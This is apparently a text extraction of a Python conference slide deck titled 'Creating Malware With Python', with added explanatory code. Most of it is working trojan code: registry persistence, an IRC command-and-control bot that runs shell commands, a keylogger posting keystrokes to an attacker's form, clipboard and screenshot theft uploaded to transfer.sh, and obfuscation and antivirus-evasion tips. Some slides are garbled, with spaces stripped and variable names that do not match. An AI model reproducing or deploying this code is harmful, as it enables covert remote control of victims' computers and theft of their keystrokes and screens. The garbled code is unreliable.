Creating Malware With Python

The document discusses how to program malware using Python, describing three techniques: 1) modifying the Windows registry to ensure the continuous execution of the malware, 2) establishing communication between the attacker and the victim using IRC, and 3) receiving and responding to commands in the IRC channel.

Hello!

I am Yan Orestes
Content producer
@yanorestes
Understanding how malware works, using Python
What is malware?
Let's understand this concept
Malware
malicious software
Ransomware
Worm
Virus

It's not just viruses! Malware
Which one to choose?
Destructive vs. useful
Trojan horse
Giving the attacker the maximum of possibilities through Command & Control (C&C)
How? Python

Why?

Why not?
Victim
Windows (8)
"An inefficient virus destroys its host. A smart virus stays with it."
James Lovelock
1. Ensuring the continued execution of the malware
Hiding the malware in other programs
Easy to program / Little effectiveness

Modifying the Windows Registry
Effective / Requires administrator privileges (for the HKEY_LOCAL_MACHINE key)
Registry

Keys

Subkeys

HKEY_LOCAL_MACHINE

Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
How to do this in Python?

● winreg
● os
from os.path import realpath
from winreg import *

# Absolute path of this script: the value Windows will launch at every logon.
file_path = realpath(__file__)
run = r'Software\Microsoft\Windows\CurrentVersion\Run'
try:
    # Opening the HKEY_LOCAL_MACHINE Run key for writing needs an elevated process.
    key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE)
except PermissionError:
    pass  # It's not running as administrator :(
else:
    SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
    key.Close()
28
How to establish
communication
between attacker and
victim?
29
Connecting to 2.
victim to
attacker
30
Direct connection between attacker and victim
Greater control / Greater exposure of the attacker

Using external services (such as Twitter)
Easy to program / Less control
IRC

How to do this in Python?

● socket
import socket

class AttackerConnection:
    def __init__(self, irc_address):
        # Plain TCP connection to the IRC server (host, port).
        self.socket = socket.socket()
        self.socket.connect(irc_address)

connection = AttackerConnection(('irc.pythonbrasil.net', 6667))

Is that all?
import socket
import re

class AttackerConnection:
    def __init__(self, irc_address, nick):
        self.socket = socket.socket()
        self.socket.connect(irc_address)
        self.register_user(nick)
        self.nick = nick

    def send_command(self, cmd):
        # IRC lines are terminated by CRLF.
        cmd += '\r\n'
        self.socket.send(cmd.encode('utf8'))

    def receive_command(self):
        msg = self.socket.recv(4096)
        msg = msg.decode('utf8', errors='ignore')
        self.respond_ping(msg)
        return msg

    def register_user(self, nick):
        # A client must send NICK and USER before the server accepts anything else.
        self.send_command('NICK ' + nick)
        self.send_command('USER {0} {0} {0} :{0}'.format(nick))

    def respond_ping(self, msg):
        # The server periodically sends 'PING :token'; answering with PONG keeps us connected.
        match = re.match('PING :(.*)', msg)
        if match:
            pong = match.group(1)
            self.send_command('PONG :' + pong)
How to take control of the victim's computer?

3. Executing commands on the victim's computer
Using os.system()
A lot of simplicity / Little flexibility

Using the subprocess module
A lot of flexibility / Where?
from subprocess import run, PIPE, STDOUT

def run_command_in_shell(cmd):
    # shell=True hands the string to the system shell; stderr is merged into stdout
    # so the attacker sees errors as well as output.
    completed_process = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT)
    response = completed_process.stdout.decode('utf8', errors='ignore')
    return response

But what about the communication with the attacker?
class AttackerConnection:
    # Code omitted
    def parse_msg(self, msg):
        # A private message to our nick looks like ':sender!user@host PRIVMSG <nick> :<text>'.
        match = re.match(r':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg)
        return match

    def receive_command(self):
        msg = self.socket.recv(4096).decode('utf8', errors='ignore')
        self.respond_ping(msg)
        msg_match = self.parse_msg(msg)
        if msg_match:
            return msg_match.groups()  # (sender's nick, message text)
        return None, None
    # Code omitted
import re

connection = AttackerConnection(('irc.rizon.net', 6667), 'MalwareBot')
commands = {'!shell': run_command_in_shell}
re_commands = '|'.join(commands.keys())
while True:
    received_nick, cmd = connection.receive_command()
    if cmd is None:
        continue  # server notice or PING, not a command addressed to us
    # '!shell dir' -> command type '!shell', arguments 'dir'
    cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd)
    if cmd_match:
        cmd_type, args = cmd_match.groups()
        response = commands[cmd_type](args)
    else:
        response = 'Command not found'
    connection.send_command('PRIVMSG {} :{}'.format(received_nick, response))
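The client above reads one recv() buffer at a time, matches PING only at the start of that buffer and hands the rest to a single regex, so a PING and a PRIVMSG that arrive in the same TCP segment, or one line split across two segments, are mishandled; and because the command regex is built from the dictionary keys with re.match, '!shellx' is accepted as '!shell'. What follows is an added example, not code from these slides: a line-buffered IRC reader and a dispatcher that looks commands up by exact name, run over a constructed server transcript so both sides of the exchange are visible without a socket. The server name irc.example.net, the operator nick oper and the harmless !echo handler are assumptions made for the example.

```python
import re

# RFC 1459 shape of a private message: ':<nick>!<user>@<host> PRIVMSG <target> :<text>'
PRIVMSG_RE = re.compile(r"^:([^!\s]+)!\S*\s+PRIVMSG\s+(\S+)\s+:(.*)$")


class IrcLineParser:
    """Accumulates raw socket chunks and returns only complete CRLF-terminated lines."""

    def __init__(self):
        self.buffer = b""

    def feed(self, chunk):
        self.buffer += chunk
        lines = []
        while b"\r\n" in self.buffer:
            line, self.buffer = self.buffer.split(b"\r\n", 1)
            lines.append(line.decode("utf8", errors="ignore"))
        return lines  # a trailing partial line stays in self.buffer for the next chunk


def handle_line(line, my_nick, commands):
    """Return the line the bot owes the server for one received line, or None."""
    if line.startswith("PING"):
        # Servers drop clients that do not echo the PING token back as PONG.
        token = line.split(":", 1)[1] if ":" in line else ""
        return "PONG :" + token
    match = PRIVMSG_RE.match(line)
    if not match:
        return None  # numerics, joins, other traffic: nothing to answer
    sender, target, text = match.groups()
    if target != my_nick:
        return None  # channel chatter is not treated as a command
    cmd_type, _, args = text.partition(" ")
    handler = commands.get(cmd_type)  # exact lookup, no regex assembled from input
    response = handler(args) if handler else "Command not found"
    return "PRIVMSG {} :{}".format(sender, response)


# Constructed transcript: a PING and a PRIVMSG share one segment, the PRIVMSG is
# split across two segments, one message is channel chatter, one command is unknown.
SAMPLE_CHUNKS = [
    b":irc.example.net 001 MalwareBot :Welcome\r\nPING :irc.example.net\r\n"
    b":oper!~o@10.0.0.5 PRIVMSG Malw",
    b"areBot :!echo hello there\r\n:oper!~o@10.0.0.5 PRIVMSG #chan :!echo ignored\r\n",
    b":oper!~o@10.0.0.5 PRIVMSG MalwareBot :!nope\r\n",
]

# Harmless stand-in for the slides' '!shell' handler.
ECHO_COMMANDS = {"!echo": lambda args: args}


def run_transcript(chunks, my_nick="MalwareBot", commands=ECHO_COMMANDS):
    """Feed every chunk through the parser and collect the lines the bot would send."""
    parser = IrcLineParser()
    sent = []
    for chunk in chunks:
        for line in parser.feed(chunk):
            reply = handle_line(line, my_nick, commands)
            if reply is not None:
                sent.append(reply)
    return sent


if __name__ == "__main__":
    for outgoing in run_transcript(SAMPLE_CHUNKS):
        print("->", outgoing)
```

Run as a script it prints the three outgoing lines: the PONG, the echoed reply to oper, and 'Command not found' for !nope; the channel message produces nothing. Plugging the slides' AttackerConnection socket in amounts to calling parser.feed() on every recv() result and send_command() on every non-None reply.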
4. Capturing user data in real time

Capturing typed keys: keylogger

How to do this in Python?

● keyboard
https://github.com/boppreh/keyboard
● requests
http://docs.python-requests.org/en/master/
● pyperclip
https://github.com/asweigart/pyperclip
import keyboard

pressed_keys = []
# Record the name of every key as it is pressed ('h', 'space', 'shift', ...).
keyboard.on_press(lambda k: pressed_keys.append(k.name))

Hello, world!
import keyboard

pressed_keys = []
special_keys = {'space': ' ', 'enter': '\n'}

def handle_key(k):
    # The shift press itself was already recorded; drop it and keep only the shifted key.
    # k.modifiers may be None, so guard before testing membership.
    if k.modifiers and 'shift' in k.modifiers:
        pressed_keys.pop()
    key = k.name
    if len(key) > 1:
        # Multi-character names are special keys: map the known ones, mark the rest.
        key = special_keys.get(key, '<< {} >>'.format(key))
    pressed_keys.append(key)

keyboard.on_press(handle_key)

And how does the attacker access this?
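The handler above stores whatever name the keyboard library reports, so a shifted letter is kept lower-case, backspace is recorded as '<< backspace >>' instead of undoing a key, and a hotkey such as ctrl+c is indistinguishable from the letter c. What follows is an added example, not code from these slides: the same reduction written as a pure function over a constructed stream of press events, so it runs with no hook installed and can be checked against what the user actually typed. KeyEvent is a stand-in with only the name and modifiers attributes of the library's event, the modifier names and the shifted-symbol table assume a US layout, and the sample event list is constructed.

```python
from collections import namedtuple

# Stand-in for keyboard.KeyboardEvent carrying only the two attributes the handler uses.
KeyEvent = namedtuple("KeyEvent", "name modifiers")

# Assumed key names for modifiers; their press carries no text of its own.
MODIFIER_NAMES = {"shift", "left shift", "right shift", "ctrl", "left ctrl", "right ctrl",
                  "alt", "left alt", "right alt", "caps lock"}
SPECIAL_KEYS = {"space": " ", "enter": "\n", "tab": "\t"}
# Assumed US layout: what shift turns the number row and punctuation into.
SHIFTED_SYMBOLS = {"1": "!", "2": "@", "3": "#", "4": "$", "5": "%", "6": "^", "7": "&",
                   "8": "*", "9": "(", "0": ")", "-": "_", "=": "+", "[": "{", "]": "}",
                   ";": ":", "'": '"', ",": "<", ".": ">", "/": "?", "`": "~", "\\": "|"}


def reduce_key_events(events):
    """Turn a sequence of key-press events into the text the user typed."""
    typed = []
    for event in events:
        name = event.name
        mods = event.modifiers or ()  # the library leaves modifiers as None when unknown
        if name in MODIFIER_NAMES:
            continue  # the modifier press itself is not text
        if name == "backspace":
            if typed:
                typed.pop()  # undo the previous character instead of recording a marker
            continue
        if "ctrl" in mods or "alt" in mods:
            # A hotkey, not text: keep it visibly distinct from typed characters.
            typed.append("<< {} >>".format("+".join(list(mods) + [name])))
        elif len(name) == 1:
            typed.append(SHIFTED_SYMBOLS.get(name, name.upper()) if "shift" in mods else name)
        else:
            typed.append(SPECIAL_KEYS.get(name, "<< {} >>".format(name)))
    return "".join(typed)


# Constructed stream: "Hello, world!" typed with a corrected typo, then Enter and ctrl+c.
SAMPLE_EVENTS = [
    KeyEvent("shift", None), KeyEvent("h", ("shift",)),
    KeyEvent("e", None), KeyEvent("l", None), KeyEvent("l", None), KeyEvent("o", None),
    KeyEvent(",", None), KeyEvent("space", None),
    KeyEvent("w", None), KeyEvent("o", None), KeyEvent("r", None), KeyEvent("k", None),
    KeyEvent("backspace", None), KeyEvent("l", None), KeyEvent("d", None),
    KeyEvent("shift", None), KeyEvent("1", ("shift",)),
    KeyEvent("enter", None), KeyEvent("ctrl", None), KeyEvent("c", ("ctrl",)),
]

if __name__ == "__main__":
    print(repr(reduce_key_events(SAMPLE_EVENTS)))
```

The same function can sit behind keyboard.on_press by appending each event to a list and reducing the list when the batch is flushed, which also means the buffer the slides post every 100 keys carries text rather than raw key names.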
from requests import post

url_form = '#linkParaForm#'  # placeholder for the attacker's form URL

def handle_key(k):
    # Code omitted
    # Every 100 keys, flush the buffer to a web form controlled by the attacker.
    if len(pressed_keys) >= 100:
        typed_text = ''.join(pressed_keys)
        pressed_keys.clear()
        post(url_form, {'entry.1269107664': typed_text})
Golden touch

from pyperclip import paste

def handle_copy_paste():
    # Runs when ctrl+c is pressed: read the clipboard into the key buffer.
    # The hotkey fires on the key press, so paste() may still return the previous
    # clipboard contents rather than what is being copied right now.
    copied_text = paste()
    pressed_keys.extend(list(copied_text))

keyboard.add_hotkey('ctrl+c', handle_copy_paste)
Capturing the victim's screen

How to do this in Python?

● pyscreenshot
https://github.com/ponty/pyscreenshot
● os
● requests
from pyscreenshot import grab_to_file

def take_screenshot(filename):
    # Save the whole screen to filename.
    grab_to_file(filename)

commands = {'!shell': run_command_in_shell,
            '!screenshot': take_screenshot}

And how does the attacker access this?
90
1. frompyscreenshotimportgrab_to_file
2.fromrequestsimportpost
3.
4. deftake_screenshot(filename):
5. grab_to_file(filename)
6. withopen(filename,'rb')asf:
7. r=post('https://transfer.sh',files={filename:f})
8. resposta=r.textifr.status_code==200elseUpload error
9. returnanswer

91
1. frompyscreenshotimportgrab_to_file
2.fromrequestsimportpost
3.
4.deftake_screenshot(filename):
5. grab_to_file(filename)
6. withopen(filename,'rb')asf:
7. r=post('https://transfer.sh',files={filename:f})
8. response=r.textifr.status_code==200elseUpload error
9. returnanswer

92
1. fromtheimportremove
2.frompyscreenshotimportgrab_to_file
3.fromrequestsimportpost
4.
5.deftake_screenshot(filename):
6. grab_to_file(filename)
7. withopen(filename,'rb')asf:
8. r=post('https://transfer.sh', files={filename:f})
9. response=r.textifr.status_code==200elseError in upload
10. returnanswer
11. remove(filename)

93
Extra!
94
Obfuscation of
5.
code

95
Compile to bytecode

Easy Easily recoverable

96
Using pyminifier

Fun Recoverable

97
Using pyminifier
1. pyminifier -O -o nivel1.py malware.py

98
Using pyminifier
1. pyminifier -O -o nivel1.py malware.py

2. pyminifier -O --nonlatin -o nivel2.py malware.py

99
Using pyminifier
1. pyminifier -O -o level1.py malware.py

2. pyminifier -O --nonlatin -o nivel2.py malware.py

3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py

100
Using pyminifier
1. pyminifier -O -o level1.py malware.py

2. pyminifier -O --nonlatin -o nivel2.py malware.py

3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py

4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o nivel4.py


malware.py

101
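Compiling to bytecode removes the source text but not the string constants and identifiers the program needs at run time, which is what "easily recoverable" means in practice. What follows is an added example, not code from these slides: it compiles a constructed stand-in for the script (carrying the deck's Run path, IRC server and PING regex as constants), marshals the code object the way a .pyc stores it, and then reads the strings and names back out of the bytecode without executing anything. The stand-in source and its names are assumptions made for the example; a decompiler recovers the control flow on top of this.

```python
import marshal
import types

# Constructed stand-in for malware.py: only its constants matter here, nothing runs.
SAMPLE_SOURCE = r'''
import re
RUN = r'Software\Microsoft\Windows\CurrentVersion\Run'

def connect():
    return ('irc.rizon.net', 6667)

class Bot:
    def parse(self, msg):
        return re.match('PING :(.*)', msg)
'''


def compile_to_bytecode(source, filename="malware.py"):
    """What 'compile to bytecode' leaves behind: the marshalled code object a .pyc carries."""
    return marshal.dumps(compile(source, filename, "exec"))


def _walk_code(code):
    """Yield a code object and every code object nested in its constants (functions, classes)."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from _walk_code(const)


def _strings_in(const):
    """Strings inside one constant, descending into folded tuples and frozensets."""
    if isinstance(const, str):
        yield const
    elif isinstance(const, (tuple, frozenset)):
        for item in const:
            yield from _strings_in(item)


def recover_strings(blob):
    """Return (string constants, identifier names) readable from bytecode without running it."""
    strings, names = set(), set()
    for code in _walk_code(marshal.loads(blob)):
        names.update(code.co_names)  # globals, attributes and imports referenced
        names.add(code.co_name)      # the function or class body's own name
        for const in code.co_consts:
            strings.update(_strings_in(const))
    return strings, names


if __name__ == "__main__":
    found, idents = recover_strings(compile_to_bytecode(SAMPLE_SOURCE))
    print("strings:", sorted(found))
    print("names:", sorted(idents))
```

The registry path, the C&C host and the protocol regex all come back verbatim, together with the names connect, Bot and parse; renaming identifiers (which is what pyminifier's -O pass does) removes the second set but not the first, so the strings an analyst or a signature would key on survive both levels.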
6. Privilege escalation
Brute force
Code injection
And how can the user protect themselves?

Precaution

Control of connections

Antivirus?

"The best antivirus is common sense"
Anonymous know-it-all

Really?

Antiviruses are unbearable
Unexpected renewal fees
Problems with the system
aaaaaaaaaaaaaaaaaaaaaaaaa
2010 - McAfee case
2011 - MSE case
2012 - Sophos case

Low effectiveness?
2006 - 40-50%
2007 - 20-30%
2013 - 91.1-99.9%
Humans fail

Unless you...
Do not share files and/or links with anyone
Do not allow anyone but yourself to use your computer
Do not use the Internet for shopping, adult entertainment, or online gaming
Never use a public WiFi network
Do not share your private WiFi with anyone
Never click on any ads
Use extremely secure passwords and never repeat any
Do not use a smartphone
Do not download anything from the Internet
Do not use an operating system
7. Protection against antivirus
● Signature => Polymorphic code
● Sandbox => Detection (mouse)
https://github.com/boppreh/mouse/
● Heuristic method => ?
Thank you very much!
Any questions?
You can talk to me at
@yanorestes
[email protected]
https://speakerdeck.com/yanorestes/criando-um-malware-com-python

Special acknowledgments
Python Brasil
▪ Roosevelt Fujikawa ([email protected])
Alura/Caelum
Code House (PythonBrasil&HouseofCode)
15%

Presentation design
This presentation uses the following fonts:
Titles: Work Sans Bold
Body: Work Sans Light
Code: Arial with formatting by dotohtml.com
You can download the fonts on this page:
https://github.com/weiweihuanghuang/Work-Sans/tree/master/fonts/desktop

Slide layouts and icons by SlidesCarnival